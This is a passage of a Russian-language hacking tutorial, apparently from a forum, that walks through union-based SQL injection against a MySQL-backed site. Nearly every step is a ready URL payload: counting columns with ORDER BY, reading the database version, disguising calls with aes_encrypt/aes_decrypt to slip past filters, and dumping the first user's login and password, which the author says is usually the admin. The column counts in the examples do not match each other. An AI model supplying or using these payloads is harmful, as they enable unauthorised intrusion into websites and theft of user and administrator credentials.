4y4o дальше нужно подобрать количество полей
например

ввв.сайт.ру/скрипт.пхп?переменная=1+union+s elect+1,2,3,4,5,6/*

можно задать больше 6 . и если на странице отобразится скажем цифра 4 то значит отобразилось значение 4 поля(самый простой метод)

можно так же подобрать количество полей (лично я так подбираю) с помощью оператора order by

например

ввв.сайт.ру/скрипт.пхп?переменная=1+order+b y+3/*
если ошибки нет то полей больше трёх или три
берём например больше
ввв.сайт.ру/скрипт.пхп?переменная=1+order+b y+10/*
если ошибка есть то полей меньше 10
и так короче находи цифру с которой ошибки небудет но следущая цифра должна отображать ошибку
скажем нашли количество полей например оно равно 6
дальше проверяеш стоит ли фильтрация на какиенибуть символы задаём команду скажем узнать версию майскула
ввв.сайт.ру/скрипт.пхп?переменная=1+union+s elect+1,2,3,4,5,version(),7,8/*
если отобразилась версия то фильтрации нет если нет то попробуй закодировать эту команду скажем так
ввв.сайт.ру/скрипт.пхп?переменная=1+union+s elect+1,2,3,4,5,aes_decrypt(aes_encrypt(con cat(version()),1),1),7,8/*
отобразилась версия. дальше нужно узнать в какой таблице лежат данные юзерей (можно с помощью брутфорса, надо бы написать мне такой а хотя уже есть наверно)
узнали например имя этой таблицы polzovateli
и выводим логин и пароль первого пользователя(он в большинстве случаев админ)

ввв.сайт.ру/скрипт.пхп?переменная=1+union+s elect+1,2,3,5,concat(username,0x3a,password)+from+ polzovateli+limit+1,1/*